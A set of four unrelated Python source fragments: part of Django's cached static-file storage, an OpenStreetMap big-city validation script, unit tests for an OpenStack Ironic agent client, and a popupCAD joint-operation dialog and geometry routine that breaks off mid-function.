        super(CachedFilesMixin, self).__init__(*args, **kwargs)
        try:
            self.cache = get_cache('staticfiles')
        except InvalidCacheBackendError:
            # Use the default backend
            self.cache = default_cache
        # Map each extension glob to its compiled replacement patterns.
        self._patterns = SortedDict()
        for extension, patterns in self.patterns:
            for pattern in patterns:
                compiled = re.compile(pattern)
                self._patterns.setdefault(extension, []).append(compiled)
    def hashed_name(self, name, content=None):
        """Return *name* with the first 12 hex digits of its MD5 hash
        inserted before the extension; *content* is opened from storage
        when not supplied."""
        parsed_name = urlsplit(unquote(name))
        clean_name = parsed_name.path
        if content is None:
            if not self.exists(clean_name):
                raise ValueError("The file '%s' could not be found with %r." %
                                 (clean_name, self))
            try:
                content = self.open(clean_name)
            except IOError:
                # Handle directory paths
                return name
        path, filename = os.path.split(clean_name)
        root, ext = os.path.splitext(filename)
        # Get the MD5 hash of the file
        md5 = hashlib.md5()
        for chunk in content.chunks():
            md5.update(chunk)
        md5sum = md5.hexdigest()[:12]
        hashed_name = os.path.join(path, u"%s.%s%s" % (root, md5sum, ext))
        # Re-attach any query/fragment from the original name.
        unparsed_name = list(parsed_name)
        unparsed_name[2] = hashed_name
        return urlunsplit(unparsed_name)
    def cache_key(self, name):
        # Namespaced cache key for the original -> hashed name mapping.
        return u'staticfiles:cache:%s' % name
    def url(self, name, force=False):
        """
        Returns the real URL in DEBUG mode.
        """
        if settings.DEBUG and not force:
            hashed_name = name
        else:
            cache_key = self.cache_key(name)
            hashed_name = self.cache.get(cache_key)
            if hashed_name is None:
                hashed_name = self.hashed_name(name)
                # set the cache if there was a miss (e.g. if cache server goes down)
                self.cache.set(cache_key, hashed_name)
        return unquote(super(CachedFilesMixin, self).url(hashed_name))
    def url_converter(self, name):
        """
        Returns the custom URL converter for the given file name.
        """
        def converter(matchobj):
            """
            Converts the matched URL depending on the parent level (`..`)
            and returns the normalized and hashed URL using the url method
            of the storage.
            """
            matched, url = matchobj.groups()
            # Completely ignore http(s) prefixed URLs
            if url.startswith(('http', 'https')):
                return matched
            name_parts = name.split('/')
            # Using posix normpath here to remove duplicates
            url = posixpath.normpath(url)
            url_parts = url.split('/')
            parent_level, sub_level = url.count('..'), url.count('/')
            if url.startswith('/'):
                sub_level -= 1
                url_parts = url_parts[1:]
            # Work out how many path components to keep from the
            # referencing file's name and the referenced url.
            if parent_level or not url.startswith('/'):
                start, end = parent_level + 1, parent_level
            else:
                if sub_level:
                    if sub_level == 1:
                        parent_level -= 1
                    start, end = parent_level, sub_level - 1
                else:
                    start, end = 1, sub_level - 1
            joined_result = '/'.join(name_parts[:-start] + url_parts[end:])
            hashed_url = self.url(unquote(joined_result), force=True)
            # Return the hashed and normalized version to the file
            return 'url("%s")' % unquote(hashed_url)
        return converter
    def post_process(self, paths, dry_run=False, **options):
        """
        Post process the given list of files (called from collectstatic).
        """
        processed_files = []
        # don't even dare to process the files if we're in dry run mode
        if dry_run:
            return processed_files
        # delete cache of all handled paths
        self.cache.delete_many([self.cache_key(path) for path in paths])
        # only try processing the files we have patterns for
        matches = lambda path: matches_patterns(path, self._patterns.keys())
        processing_paths = [path for path in paths if matches(path)]
        # then sort the files by the directory level
        path_level = lambda name: len(name.split(os.sep))
        for name in sorted(paths, key=path_level, reverse=True):
            # first get a hashed name for the given file
            hashed_name = self.hashed_name(name)
            with self.open(name) as original_file:
                # then get the original's file content
                content = original_file.read()
                # to apply each replacement pattern on the content
                if name in processing_paths:
                    converter = self.url_converter(name)
                    for patterns in self._patterns.values():
                        for pattern in patterns:
                            content = pattern.sub(converter, content)
                # then save the processed result
                if self.exists(hashed_name):
                    self.delete(hashed_name)
                saved_name = self._save(hashed_name, ContentFile(content))
                hashed_name = force_unicode(saved_name.replace('\\', '/'))
                processed_files.append(hashed_name)
                # and then set the cache accordingly
                self.cache.set(self.cache_key(name), hashed_name)
        return processed_files
class CachedStaticFilesStorage(CachedFilesMixin, StaticFilesStorage):
    """
    A static file system storage backend which also saves
    hashed copies of the files it saves.
    """
    # All behavior comes from composing the mixin with the base storage.
    pass
class AppStaticStorage(FileSystemStorage):
    """
    A file system storage backend that takes an app module and works
    for the ``static`` directory of it.
    """
    # Optional URL prefix under which this app's files are collected.
    prefix = None
    # Subdirectory of the app package that holds its static files.
    source_dir = 'static'
    def __init__(self, app, *args, **kwargs):
        """
        Returns a static file storage if available in the given app.
        """
        # app is the actual app module
        mod = import_module(app)
        mod_path = os.path.dirname(mod.__file__)
        location = os.path.join(mod_path, self.source_dir)
        super(AppStaticStorage, self).__init__(location, *args, **kwargs)
class ConfiguredStorage(LazyObject):
    # Lazily instantiate the storage class named by STATICFILES_STORAGE,
    # deferring settings access until first attribute use.
    def _setup(self):
        self._wrapped = get_storage_class(settings.STATICFILES_STORAGE)()

# Module-level singleton used throughout the staticfiles app.
staticfiles_storage = ConfiguredStorage()
| |
"""
Current version of reference city list can be found at
http://testdata.mapsme.cloud.devmail.ru/planet_checks/osm_big_cities_full_data.geojson
The script verifies that OSM dump contains all cities from a geojson-formatted
reference list. This file is usually obtained with the overpass-query:
node[place=city](if:t["population"] >= 200000 || t["capital"]=='yes');
Thus, the result doesn't contain some cities which, during extraction:
1) have had 'town' status;
2) have been [temporarily] lacking the "place=*" tag at all.
On the other hand, the generated reference list contains even small cities
with poorly formatted population like "3,565" or "3 565". However this
reference list helps not to lose already revealed cities.
The reference list is compared with cities from the filtered planet dump:
/path/to/osmctools/osmfilter "${PLANET}" \
--keep="( place=city OR place=town ) AND ( capital=yes OR capital=2 OR \
population>=200000 )" \
--keep-tags="all place= capital= name= name:en= population=" \
--ignore-dependencies \
--drop-version \
--out-osm \
-o="big_cities-filtered.osm"
Note that the result will not contain cities with a non-integer population
tag; however, with the help of this script we will be able to detect such
cities and fix their tags in OSM.
TODO:
*) inform about big cities found in OSM but not in reference list, to
augment reference list with cities that were broken or have had no population.
"""
import argparse
import functools
import itertools
import json
import logging
import math
import sys
from collections import defaultdict
try:
from lxml import etree
except ImportError:
import xml.etree.ElementTree as etree
PLACE_TAGS = ('place', 'name', 'name:en')
class ValidationError(Exception):
    """Raised when validation of the city list fails."""
def big_cities_generator(filename):
    """Yield city features parsed from an OSM XML file.

    Each feature is a dict with 'id' (e.g. 'n123'), 'tags' (PLACE_TAGS
    mapped to their values or None) and 'position' ([lon, lat] floats).
    Only <node> elements carrying a place= tag are yielded.
    """
    for _event, element in etree.iterparse(filename):
        # TODO: include also ways/relations. Being got with osmfilter they
        ## don't contain coordinates. Try osmconvert --all-to-nodes.
        if element.tag != 'node':
            continue
        tags = dict.fromkeys(PLACE_TAGS)
        for child in (c for c in element if c.tag == 'tag'):
            key = child.get('k')
            if key in tags:
                tags[key] = child.get('v')
        if tags['place'] is None:
            continue
        yield {
            # element.tag is always 'node' here, so the prefix is 'n'.
            'id': f"n{element.get('id')}",
            'tags': tags,
            'position': [float(element.get(c)) for c in ('lon', 'lat')]
        }
        # Free the parsed element once consumed to keep memory bounded.
        element.clear()
def read_reference_cities(reference_geojson_filename):
    """Returns list of cities as objects with fields 'id',
    'properties', 'geometry' (as geojson features generated by overpass-api).
    """
    with open(reference_geojson_filename) as geojson_file:
        return json.load(geojson_file)['features']
def extract_osm_cities(big_cities_osm_filename):
    """Index OSM cities by every name they carry.

    Returns a defaultdict mapping each 'name' and each distinct
    'name:en' value to the list of city features bearing it; cities
    without any name are skipped with a warning.
    """
    cities_by_name = defaultdict(list)
    for city in big_cities_generator(big_cities_osm_filename):
        tags = city['tags']
        name = tags.get('name')
        name_en = tags.get('name:en')
        if not (name or name_en):
            logging.warning(f"City without name and name:en {city['id']}")
            continue
        if name:
            cities_by_name[name].append(city)
        if name_en and name_en != name:
            cities_by_name[name_en].append(city)
    return cities_by_name
# Two coordinates are "close" when they differ by at most 0.25 degrees
# (1deg~100 km).
coord_isclose = functools.partial(math.isclose, abs_tol=0.25)
def are_locations_close(position1, position2):
    """Return True when both lon/lat components are within tolerance."""
    for axis in (0, 1):
        if not coord_isclose(position1[axis], position2[axis]):
            return False
    return True
def get_city_names(city):
    """Return the city's non-empty names, 'name:en' first, then 'name'."""
    properties = city['properties']
    names = []
    for tag in ('name:en', 'name'):
        value = properties.get(tag)
        if value:  # drop None/'' just like filter(None, ...)
            names.append(value)
    return names
def find_matching_cities_for_reference(reference_city, osm_cities_by_name):
    """Return OSM cities that share a name with *reference_city* and lie
    close to its coordinates; each city is reported at most once."""
    ref_position = reference_city['geometry']['coordinates']
    matched = []
    matched_ids = set()
    for name in get_city_names(reference_city):
        for city in osm_cities_by_name[name]:
            if city['id'] in matched_ids:
                continue
            if are_locations_close(ref_position, city['position']):
                matched.append(city)
                matched_ids.add(city['id'])
    return matched
def validate_big_cities(big_cities_osm_filename, reference_geojson_filename):
    """This function compares reference city file with OSM data, generates
    logging messages of different level on data errors, and raises an exception
    if critical errors encounter.

    Raises ValidationError when a reference city has no name tags or when
    at least one reference city cannot be matched in the OSM data.
    """
    reference_cities = read_reference_cities(reference_geojson_filename)
    osm_cities_by_name = extract_osm_cities(big_cities_osm_filename)
    all_cities_found = True
    for ref_city in reference_cities:
        city_names = get_city_names(ref_city)
        if not city_names:
            raise ValidationError(f"Reference city {ref_city['id']} "
                                  f"without name tags")
        display_name = city_names[0]
        matching_cities = find_matching_cities_for_reference(
            ref_city,
            osm_cities_by_name
        )
        num_matched_cities = len(matching_cities)
        if num_matched_cities != 1:
            if num_matched_cities > 1:
                # Duplicates are suspicious but not fatal.
                logging.warning(f"More than one city {display_name} at one "
                                f"place: {[x['id'] for x in matching_cities]}")
            else:
                # Keep scanning so every missing city is reported
                # before the final failure.
                all_cities_found = False
                logging.critical(f"Not found city {display_name} ({ref_city['id']})"
                                 f" {ref_city['geometry']['coordinates']}")
    if not all_cities_found:
        raise ValidationError("Not all cities found in OSM")
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # Build the --log-level choices from logging's registered levels.
    # NOTE(review): logging._levelToName is a private API — revisit if it
    # breaks on a future Python release.
    log_levels = [
        name.lower()
        for number, name in logging._levelToName.items()
        if number > 0
    ]
    parser.add_argument('-L', '--log-level', choices=log_levels,
                        default='critical', help='log level')
    parser.add_argument('-c', '--big-cities-current', required=True,
                        help='Path to *.osm with big cities')
    parser.add_argument('-r', '--big-cities-reference', required=True,
                        help='Path to geojson with required cities')
    options = parser.parse_args()
    log_level_name = options.log_level.upper()
    logging.basicConfig(level=getattr(logging, log_level_name),
                        format='%(levelname)-8s %(message)s')
    try:
        validate_big_cities(
            options.big_cities_current,
            options.big_cities_reference
        )
    except ValidationError as e:
        logging.critical(e)
        sys.exit(1)
    except Exception as e:
        # Unexpected failure: log the full traceback, exit non-zero.
        logging.critical("", exc_info=1)
        sys.exit(1)
| |
# Copyright 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import mock
import requests
import six
from ironic.common import exception
from ironic.drivers.modules import agent_client
from ironic.tests import base
class MockResponse(object):
    """Minimal stand-in for requests.Response holding a text body."""
    def __init__(self, text):
        # Only string bodies make sense for an HTTP response stub.
        assert isinstance(text, six.string_types)
        self.text = text
    def json(self):
        """Decode the stored body as JSON, like requests.Response.json()."""
        return json.loads(self.text)
class MockNode(object):
    """Lightweight fake of an Ironic node object for client tests."""
    def __init__(self):
        self.uuid = 'uuid'
        self.driver_info = {}
        self.driver_internal_info = {
            'agent_url': "http://127.0.0.1:9999",
            'clean_version': {'generic': '1'}
        }
        self.instance_info = {}
    def as_dict(self):
        """Serialize the node the way the conductor hands it to the agent."""
        fields = ('uuid', 'driver_info', 'driver_internal_info',
                  'instance_info')
        return {field: getattr(self, field) for field in fields}
class TestAgentClient(base.TestCase):
    """Unit tests for agent_client.AgentClient with a mocked HTTP session."""
    def setUp(self):
        super(TestAgentClient, self).setUp()
        self.client = agent_client.AgentClient()
        # Replace the real requests session so no HTTP traffic happens.
        self.client.session = mock.Mock(autospec=requests.Session)
        self.node = MockNode()
    def test_content_type_header(self):
        client = agent_client.AgentClient()
        self.assertEqual('application/json',
                         client.session.headers['Content-Type'])
    def test__get_command_url(self):
        command_url = self.client._get_command_url(self.node)
        expected = self.node.driver_internal_info['agent_url'] + '/v1/commands'
        self.assertEqual(expected, command_url)
    def test__get_command_url_fail(self):
        # Without agent_url the client cannot reach the agent.
        del self.node.driver_internal_info['agent_url']
        self.assertRaises(exception.IronicException,
                          self.client._get_command_url,
                          self.node)
    def test__get_command_body(self):
        expected = json.dumps({'name': 'prepare_image', 'params': {}})
        self.assertEqual(expected,
                         self.client._get_command_body('prepare_image', {}))
    def test__command(self):
        response_data = {'status': 'ok'}
        response_text = json.dumps(response_data)
        self.client.session.post.return_value = MockResponse(response_text)
        method = 'standby.run_image'
        image_info = {'image_id': 'test_image'}
        params = {'image_info': image_info}
        url = self.client._get_command_url(self.node)
        body = self.client._get_command_body(method, params)
        response = self.client._command(self.node, method, params)
        self.assertEqual(response, response_data)
        self.client.session.post.assert_called_once_with(
            url,
            data=body,
            params={'wait': 'false'})
    def test__command_fail_json(self):
        # A non-JSON agent response must surface as an IronicException.
        response_text = 'this be not json matey!'
        self.client.session.post.return_value = MockResponse(response_text)
        method = 'standby.run_image'
        image_info = {'image_id': 'test_image'}
        params = {'image_info': image_info}
        url = self.client._get_command_url(self.node)
        body = self.client._get_command_body(method, params)
        self.assertRaises(exception.IronicException,
                          self.client._command,
                          self.node, method, params)
        self.client.session.post.assert_called_once_with(
            url,
            data=body,
            params={'wait': 'false'})
    def test_get_commands_status(self):
        with mock.patch.object(self.client.session, 'get') as mock_get:
            res = mock.Mock()
            res.json.return_value = {'commands': []}
            mock_get.return_value = res
            self.assertEqual([], self.client.get_commands_status(self.node))
    @mock.patch('uuid.uuid4', mock.MagicMock(return_value='uuid'))
    def test_prepare_image(self):
        self.client._command = mock.Mock()
        image_info = {'image_id': 'image'}
        params = {'image_info': image_info}
        self.client.prepare_image(self.node,
                                  image_info,
                                  wait=False)
        self.client._command.assert_called_once_with(node=self.node,
                                                     method='standby.prepare_image',
                                                     params=params,
                                                     wait=False)
    @mock.patch('uuid.uuid4', mock.MagicMock(return_value='uuid'))
    def test_prepare_image_with_configdrive(self):
        # The configdrive from instance_info must be forwarded verbatim.
        self.client._command = mock.Mock()
        configdrive_url = 'http://swift/configdrive'
        self.node.instance_info['configdrive'] = configdrive_url
        image_info = {'image_id': 'image'}
        params = {
            'image_info': image_info,
            'configdrive': configdrive_url,
        }
        self.client.prepare_image(self.node,
                                  image_info,
                                  wait=False)
        self.client._command.assert_called_once_with(node=self.node,
                                                     method='standby.prepare_image',
                                                     params=params,
                                                     wait=False)
    @mock.patch('uuid.uuid4', mock.MagicMock(return_value='uuid'))
    def test_start_iscsi_target(self):
        self.client._command = mock.Mock()
        iqn = 'fake-iqn'
        params = {'iqn': iqn}
        self.client.start_iscsi_target(self.node, iqn)
        self.client._command.assert_called_once_with(node=self.node,
                                                     method='iscsi.start_iscsi_target',
                                                     params=params,
                                                     wait=True)
    @mock.patch('uuid.uuid4', mock.MagicMock(return_value='uuid'))
    def test_install_bootloader(self):
        self.client._command = mock.Mock()
        root_uuid = 'fake-root-uuid'
        efi_system_part_uuid = 'fake-efi-system-part-uuid'
        params = {'root_uuid': root_uuid,
                  'efi_system_part_uuid': efi_system_part_uuid}
        self.client.install_bootloader(
            self.node, root_uuid, efi_system_part_uuid=efi_system_part_uuid)
        self.client._command.assert_called_once_with(
            node=self.node, method='image.install_bootloader', params=params,
            wait=True)
    def test_get_clean_steps(self):
        self.client._command = mock.Mock()
        ports = []
        expected_params = {
            'node': self.node.as_dict(),
            'ports': []
        }
        self.client.get_clean_steps(self.node,
                                    ports)
        self.client._command.assert_called_once_with(node=self.node,
                                                     method='clean.get_clean_steps',
                                                     params=expected_params,
                                                     wait=True)
    def test_execute_clean_step(self):
        self.client._command = mock.Mock()
        ports = []
        step = {'priority': 10, 'step': 'erase_devices', 'interface': 'deploy'}
        expected_params = {
            'step': step,
            'node': self.node.as_dict(),
            'ports': [],
            'clean_version': self.node.driver_internal_info.get(
                'hardware_manager_version')
        }
        self.client.execute_clean_step(step,
                                       self.node,
                                       ports)
        self.client._command.assert_called_once_with(node=self.node,
                                                     method='clean.execute_clean_step',
                                                     params=expected_params,
                                                     wait=False)
| |
from __future__ import print_function, division #Fixes crossplatform print issues
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes.
Email: danaukes<at>seas.harvard.edu.
Please see LICENSE.txt for full license.
"""
from popupcad.widgets.dragndroptree import DraggableTreeWidget
import PySide.QtGui as qg
import PySide.QtCore as qc
import popupcad
from popupcad.filetypes.operationoutput import OperationOutput
from popupcad.filetypes.operation2 import Operation2, LayerBasedOperation
from popupcad.filetypes.laminate import Laminate
from popupcad.widgets.table_editor_popup import Table,SingleItemListElement_old, MultiItemListElement, FloatElement, Row,Delegate,TableControl
from popupcad.widgets.listmanager import SketchListManager
try:
import itertools.izip as zip
except ImportError:
pass
class JointRow(Row):
    """Table row describing one joint: its sketch, layers, geometry and
    dynamics parameters."""
    def __init__(self, get_sketches, get_layers):
        # get_sketches / get_layers are callables that supply the
        # selectable items for the list-based cells.
        elements = []
        elements.append(SingleItemListElement_old('joint sketch', get_sketches))
        elements.append(SingleItemListElement_old('joint layer', get_layers))
        elements.append(MultiItemListElement('sublaminate layers', get_layers))
        elements.append(FloatElement('hinge width'))
        elements.append(FloatElement('stiffness'))
        elements.append(FloatElement('damping'))
        elements.append(FloatElement('preload'))
        # Joint travel limits, in degrees.
        elements.append(FloatElement('limit negative', ini=-180))
        elements.append(FloatElement('limit positive', ini=180))
        self.elements = elements
class JointDef(object):
    """Value object holding the parameters that define a single joint."""
    # Attribute names, in constructor-argument order.
    _fields = ('sketch', 'joint_layer', 'sublaminate_layers', 'width',
               'stiffness', 'damping', 'preload_angle', 'limit_negative',
               'limit_positive')
    def __init__(self, sketch, joint_layer, sublaminate_layers, width,
                 stiffness, damping, preload_angle, limit_negative,
                 limit_positive):
        # Bind each argument to the attribute of the same name.
        values = (sketch, joint_layer, sublaminate_layers, width, stiffness,
                  damping, preload_angle, limit_negative, limit_positive)
        for field, value in zip(self._fields, values):
            setattr(self, field, value)
    def copy(self):
        """Return a new JointDef sharing this one's attribute values
        (a shallow copy)."""
        return type(self)(*(getattr(self, field) for field in self._fields))
class MainWidget(qg.QDialog):
    """Dialog for configuring a joint operation.

    Lets the user pick the device operation, the fixed-region operation, a
    contact-points sketch, and fill a table with one row per joint
    (sketch, layer, sublaminate layers, and numeric joint parameters).
    """

    def __init__(self, design, sketches, layers, operations, jointop=None, sketch=None):
        super(MainWidget, self).__init__()
        self.design = design
        self.sketches = sketches
        self.layers = layers
        self.operations = operations
        # Tree for choosing the device (parent) operation output.
        self.operation_list = DraggableTreeWidget()
        self.operation_list.linklist(self.operations)
        # Tree for choosing the fixed-region operation output.
        self.fixed = DraggableTreeWidget()
        self.fixed.linklist(self.operations)
        # One table row per joint definition; see JointRow for column layout.
        self.table = Table(JointRow(self.get_sketches, self.get_layers), Delegate)
        table_control = TableControl(self.table, self)
        self.sketchwidget = SketchListManager(self.design, name='Contact Points Sketch')
        # Pre-select the previously chosen contact-points sketch, if any.
        for ii in range(self.sketchwidget.itemlist.count()):
            item = self.sketchwidget.itemlist.item(ii)
            if item.value == sketch:
                item.setSelected(True)
        button_ok = qg.QPushButton('Ok')
        button_cancel = qg.QPushButton('Cancel')
        button_ok.clicked.connect(self.accept)
        button_cancel.clicked.connect(self.reject)
        # Layout: three columns (device, fixed region, sketch picker) above
        # the joint table, with Ok/Cancel centered at the bottom.
        sublayout1 = qg.QHBoxLayout()
        sublayout1_1 = qg.QVBoxLayout()
        sublayout1_2 = qg.QVBoxLayout()
        sublayout1_3 = qg.QVBoxLayout()
        sublayout1_1.addWidget(qg.QLabel('Device'))
        sublayout1_1.addWidget(self.operation_list)
        sublayout1_2.addWidget(qg.QLabel('Fixed Region'))
        sublayout1_2.addWidget(self.fixed)
        sublayout1_3.addWidget(self.sketchwidget)
        sublayout1.addLayout(sublayout1_1)
        sublayout1.addLayout(sublayout1_2)
        sublayout1.addLayout(sublayout1_3)
        sublayout2 = qg.QHBoxLayout()
        sublayout2.addStretch()
        sublayout2.addWidget(button_ok)
        sublayout2.addWidget(button_cancel)
        sublayout2.addStretch()
        layout = qg.QVBoxLayout()
        layout.addLayout(sublayout1)
        layout.addWidget(table_control)
        layout.addLayout(sublayout2)
        self.setLayout(layout)
        # When editing an existing operation, restore its prior selections.
        if jointop is not None:
            try:
                op_ref, output_ii = jointop.operation_links['parent'][0]
                op_ii = design.operation_index(op_ref)
                self.operation_list.selectIndeces([(op_ii, output_ii)])
            except (IndexError, KeyError):
                pass
            try:
                fixed_ref, fixed_output_ii = jointop.operation_links[
                    'fixed'][0]
                fixed_ii = design.operation_index(fixed_ref)
                self.fixed.selectIndeces([(fixed_ii, fixed_output_ii)])
            except (IndexError, KeyError):
                pass
            # Re-populate the joint table from the stored joint definitions,
            # resolving stored ids back into sketch/layer objects.
            for item in jointop.joint_defs:
                sketch = self.design.sketches[item.sketch]
                joint_layer = self.design.return_layer_definition().getlayer(
                    item.joint_layer)
                sublaminate_layers = [self.design.return_layer_definition().getlayer(
                    item2) for item2 in item.sublaminate_layers]
                self.table.row_add(
                    sketch,
                    joint_layer,
                    sublaminate_layers,
                    item.width,
                    item.stiffness,
                    item.damping,
                    item.preload_angle,
                    item.limit_negative,
                    item.limit_positive)
        else:
            self.table.row_add_empty()
        self.table.resizeColumnsToContents()
        self.table.reset_min_width()
        self.table.setHorizontalScrollBarPolicy(qc.Qt.ScrollBarPolicy.ScrollBarAlwaysOff)

    def contact_sketch(self):
        """Return the selected contact-points sketch, or None if none selected."""
        try:
            return self.sketchwidget.itemlist.selectedItems()[0].value
        except IndexError:
            return None

    def get_sketches(self):
        # Accessor handed to the table so list cells can enumerate sketches.
        return self.sketches

    def get_layers(self):
        # Accessor handed to the table so list cells can enumerate layers.
        return self.layers

    def acceptdata(self):
        """Collect dialog state for JointOperation3.editdata().

        Returns:
            (operation_links, sketch_links, jointdefs): operation links for
            'parent' and 'fixed', the contact-points sketch id, and one
            JointDef per table row.
        """
        jointdefs = []
        for ii in range(self.table.rowCount()):
            # Column order matches JointRow's element order.
            sketch = self.table.item(ii, 0).data(qc.Qt.ItemDataRole.UserRole)
            joint_layer = self.table.item(
                ii, 1).data(
                qc.Qt.ItemDataRole.UserRole)
            sublaminate_layers = self.table.item(
                ii, 2).data(
                qc.Qt.ItemDataRole.UserRole)
            width = (self.table.item(ii, 3).data(qc.Qt.ItemDataRole.UserRole))
            stiffness = (
                self.table.item(
                    ii, 4).data(
                    qc.Qt.ItemDataRole.UserRole))
            damping = (
                self.table.item(
                    ii,
                    5).data(
                    qc.Qt.ItemDataRole.UserRole))
            preload_angle = (self.table.item(ii, 6).data(qc.Qt.ItemDataRole.UserRole))
            limit_negative = (self.table.item(ii, 7).data(qc.Qt.ItemDataRole.UserRole))
            limit_positive = (self.table.item(ii, 8).data(qc.Qt.ItemDataRole.UserRole))
            # Store ids (not objects) so the definitions survive serialization.
            jointdefs.append(JointDef(sketch.id,
                                      joint_layer.id,
                                      [item.id for item in sublaminate_layers],
                                      width,
                                      stiffness,
                                      damping,
                                      preload_angle, limit_negative, limit_positive))
        operation_links = {}
        operation_links['parent'] = self.operation_list.currentRefs()
        operation_links['fixed'] = self.fixed.currentRefs()
        sketch_links = {}
        sketch_links['contact_points'] = [self.contact_sketch().id]
        return operation_links, sketch_links, jointdefs
class JointOperation3(Operation2, LayerBasedOperation):
    """Joint operation: splits a device laminate into rigid bodies connected
    by hinge lines, recording connectivity and per-joint dynamic properties.
    """
    name = 'JointOp'
    # Buffer resolution (passed to every Laminate.buffer call below).
    resolution = 2

    def copy(self):
        """Deep-ish copy: joint_defs are copied, links are shared."""
        new = type(self)(
            self.operation_links, self.sketch_links, [item.copy() for item in self.joint_defs])
        new.id = self.id
        new.customname = self.customname
        return new

    def __init__(self, *args):
        super(JointOperation3, self).__init__()
        self.editdata(*args)
        self.id = id(self)

    def editdata(self, operation_links, sketch_links, joint_defs):
        # No design links beyond operations/sketches; pass {} for design_links.
        super(JointOperation3, self).editdata(operation_links, sketch_links, {})
        self.joint_defs = joint_defs

    @classmethod
    def buildnewdialog(cls, design, currentop):
        """Dialog for creating a new joint operation."""
        dialog = MainWidget(
            design,
            design.sketches.values(),
            design.return_layer_definition().layers,
            design.operations)
        return dialog

    def buildeditdialog(self, design):
        """Dialog pre-populated with this operation's current settings."""
        sketch = design.sketches[self.sketch_links['contact_points'][0]]
        dialog = MainWidget(
            design,
            design.sketches.values(),
            design.return_layer_definition().layers,
            design.prioroperations(self),
            self, sketch)
        return dialog

    def sketchrefs(self):
        """All sketch ids this operation depends on, including joint sketches."""
        items = super(JointOperation3, self).sketchrefs()
        items.extend([item.sketch for item in self.joint_defs])
        return items

    def gen_geoms(self, joint_def, layerdef, design):
        """Build the hinge geometry for one joint definition.

        Returns:
            (allgeoms4, buffered_split, hingelines, joint_props):
            allgeoms4 -- one hinge-gap sublaminate per hinge line;
            buffered_split -- buffered sketch laminate used to cut the hinge
            layer; hingelines -- valid hinge line geometries; joint_props --
            this joint's (stiffness, damping, preload, limits) tuple repeated
            once per hinge line.
        """
        print('Generating geometry')
        # Joint width is specified in user units; scale into CSG units.
        hinge_gap = joint_def.width * popupcad.csg_processing_scaling
        split_buffer = .1 * hinge_gap
        stiffness = joint_def.stiffness
        damping = joint_def.damping
        preload_angle = joint_def.preload_angle
        limit_negative = joint_def.limit_negative
        limit_positive = joint_def.limit_positive
        sublaminate_layers = [
            layerdef.getlayer(item) for item in joint_def.sublaminate_layers]
        hingelayer = layerdef.getlayer(joint_def.joint_layer)
        # Place the joint sketch geometry on the hinge layer only.
        operationgeom = design.sketches[joint_def.sketch].output_csg()
        sketch_result = Laminate(design.return_layer_definition())
        sketch_result.replacelayergeoms(hingelayer, operationgeom)
        hingelines = sketch_result.to_generic_laminate().geoms[hingelayer]
        hingelines = [item for item in hingelines if item.is_valid_bool()]
        buffered_split = sketch_result.buffer(
            split_buffer,
            resolution=self.resolution)
        # One hinge-gap laminate, spanning the sublaminate layers, per line.
        allgeoms4 = []
        for geom in hingelines:
            geom = geom.to_shapely()
            laminate = Laminate(layerdef)
            for layer in sublaminate_layers:
                laminate.replacelayergeoms(layer, [geom])
            allgeoms4.append(
                laminate.buffer(
                    hinge_gap,
                    resolution=self.resolution))
        joint_props = [(stiffness, damping, preload_angle, limit_negative, limit_positive)
                       for item in hingelines]
        return allgeoms4, buffered_split, hingelines, joint_props

    def generate(self, design):
        """Compute the operation's outputs.

        Splits the parent laminate at the hinges, detects rigid bodies,
        determines which bodies each hinge connects, and stores results on
        self (fixed_bodies, bodies_generic, connections, all_joint_props,
        output).
        """
        safe_buffer1 = .5 * popupcad.csg_processing_scaling
        safe_buffer2 = .5 * popupcad.csg_processing_scaling
        safe_buffer3 = .5 * popupcad.csg_processing_scaling
        # Resolve the device laminate from the 'parent' link.
        parent_id, parent_output_index = self.operation_links['parent'][0]
        parent_index = design.operation_index(parent_id)
        parent = design.operations[parent_index].output[
            parent_output_index].csg
        # Resolve the fixed-region laminate from the 'fixed' link.
        fixed_id, fixed_output_index = self.operation_links['fixed'][0]
        fixed_index = design.operation_index(fixed_id)
        fixed = design.operations[fixed_index].output[fixed_output_index].csg
        layerdef = design.return_layer_definition()
        allgeoms = []
        allhingelines = []
        buffered_splits = []
        all_joint_props = {}
        # Collect hinge geometry from every joint definition.
        for joint_def in self.joint_defs:
            allgeoms4, buffered_split, hingelines, joint_props = self.gen_geoms(
                joint_def, layerdef, design)
            allgeoms.extend(allgeoms4)
            allhingelines.extend(hingelines)
            buffered_splits.append(buffered_split)
            for jointline, jointprop in zip(hingelines, joint_props):
                all_joint_props[jointline] = jointprop
        #allhingelines, buffered_splits = zip(*sorted(zip(allhingelines, allgeoms, buffered_splits)))
        #allhingelines = list(allhingelines)
        #allgeoms = list(allgeoms)
        #buffered_splits = list(buffered_splits)
        # "Safe" sections: each hinge region minus a buffered union of all
        # other hinge regions, so overlapping hinges don't claim each other.
        safe_sections = []
        for ii in range(len(allgeoms)):
            unsafe = Laminate.unaryoperation(
                allgeoms[:ii] + allgeoms[ii + 1:],
                'union')
            unsafe_buffer = unsafe.buffer(
                safe_buffer1,
                resolution=self.resolution)
            safe_sections.append(allgeoms[ii].difference(unsafe_buffer))
        safe = Laminate.unaryoperation(safe_sections, 'union')
        buffered_splits2 = Laminate.unaryoperation(buffered_splits, 'union')
        safe_buffer = safe.buffer(safe_buffer2, resolution=self.resolution)
        unsafe = Laminate.unaryoperation(
            allgeoms,
            'union').difference(safe_buffer)
        unsafe2 = unsafe.buffer(safe_buffer3, resolution=self.resolution)
        # Cut the hinge gaps and the hinge-layer splits out of the parent.
        split1 = parent.difference(unsafe2)
        split2 = split1.difference(buffered_splits2)
        bodies = popupcad.algorithms.body_detection.find(
            split2.to_generic_laminate())
        bodies_generic = [item.to_generic_laminate() for item in bodies]
        # For each hinge line, find the bodies its safe section touches.
        connections = {}
        connections2 = {}
        for line, geom in zip(allhingelines, safe_sections):
            connections[line] = []
            connections2[line] = []
            for body, body_generic in zip(bodies, bodies_generic):
                if not geom.intersection(body).isEmpty():
                    connections[line].append(body_generic)
                    connections2[line].append(body)
        for line, geoms in connections2.items():
